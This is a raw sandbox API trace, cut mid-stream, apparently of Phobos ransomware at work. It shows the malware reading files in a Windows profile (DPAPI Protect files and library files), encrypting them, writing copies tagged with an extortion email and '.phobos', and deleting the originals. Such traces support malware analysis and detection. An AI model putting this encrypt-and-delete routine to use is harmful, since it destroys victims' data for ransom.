[0199.564] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1e0, lpOverlapped=0x0) returned 1 [0199.565] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0199.565] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.565] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0199.565] CryptDestroyKey (hKey=0xa32a28) returned 1 [0199.565] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0199.566] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.566] CloseHandle (hObject=0x130) returned 1 [0199.566] CloseHandle (hObject=0x15c) returned 1 [0199.566] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d")) returned 1 [0199.567] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.567] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.568] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=24) returned 1 [0199.568] CloseHandle (hObject=0x15c) returned 1 [0199.568] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred")) returned 0x2026 [0199.568] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.568] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.568] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.569] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.569] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.569] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x18, lpOverlapped=0x0) returned 1 [0199.570] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20, dwBufLen=0x20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20) returned 1 [0199.570] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x20, lpOverlapped=0x0) returned 1 [0199.571] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0199.571] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.571] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0199.571] CryptDestroyKey (hKey=0xa32a28) returned 1 [0199.571] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0199.571] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.571] CloseHandle (hObject=0x15c) returned 1 [0199.571] CloseHandle (hObject=0x130) returned 1 [0199.571] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred")) returned 1 [0199.572] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.573] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=76) returned 1 [0199.573] CloseHandle (hObject=0x130) returned 1 [0199.573] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist")) returned 0x2026 [0199.573] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.573] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.573] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.573] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.573] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.573] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4c, lpOverlapped=0x0) returned 1 [0199.574] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0199.574] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x50, lpOverlapped=0x0) returned 1 [0199.575] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0199.575] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.575] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0199.575] CryptDestroyKey (hKey=0xa32a28) returned 1 [0199.575] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0199.575] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.575] CloseHandle (hObject=0x130) returned 1 [0199.575] CloseHandle (hObject=0x15c) returned 1 [0199.575] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist")) returned 1 [0199.576] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.576] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.577] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3627) returned 1 [0199.577] CloseHandle (hObject=0x15c) returned 1 [0199.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms")) returned 0x2020 [0199.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.577] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.577] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.578] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.578] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.578] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xe2b, lpOverlapped=0x0) returned 1 [0199.579] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe30, dwBufLen=0xe30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe30) returned 1 [0199.579] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe30, lpOverlapped=0x0) returned 1 [0199.580] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0199.580] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.580] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0199.580] CryptDestroyKey (hKey=0xa32a28) returned 1 [0199.580] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0199.580] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.580] CloseHandle (hObject=0x15c) returned 1 [0199.580] CloseHandle (hObject=0x130) returned 1 [0199.580] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms")) returned 1 [0199.581] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.582] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3584) returned 1 [0199.582] CloseHandle (hObject=0x130) returned 1 [0199.582] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms")) returned 0x2020 [0199.582] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.582] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.582] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.583] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.583] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.583] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xe00, lpOverlapped=0x0) returned 1 [0199.584] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe10, dwBufLen=0xe10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe10) returned 1 [0199.584] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe10, lpOverlapped=0x0) returned 1 [0199.585] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0199.585] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.585] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0199.585] CryptDestroyKey (hKey=0xa32a28) returned 1 [0199.585] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0199.585] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.585] CloseHandle (hObject=0x130) returned 1 [0199.585] CloseHandle (hObject=0x15c) returned 1 [0199.586] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms")) returned 1 [0199.587] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.587] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3619) returned 1 [0199.587] CloseHandle (hObject=0x15c) returned 1 [0199.587] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms")) returned 0x2020 [0199.587] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.588] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.588] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.588] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.588] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.588] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xe23, lpOverlapped=0x0) returned 1 [0199.589] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe30, dwBufLen=0xe30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe30) returned 1 [0199.589] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe30, lpOverlapped=0x0) 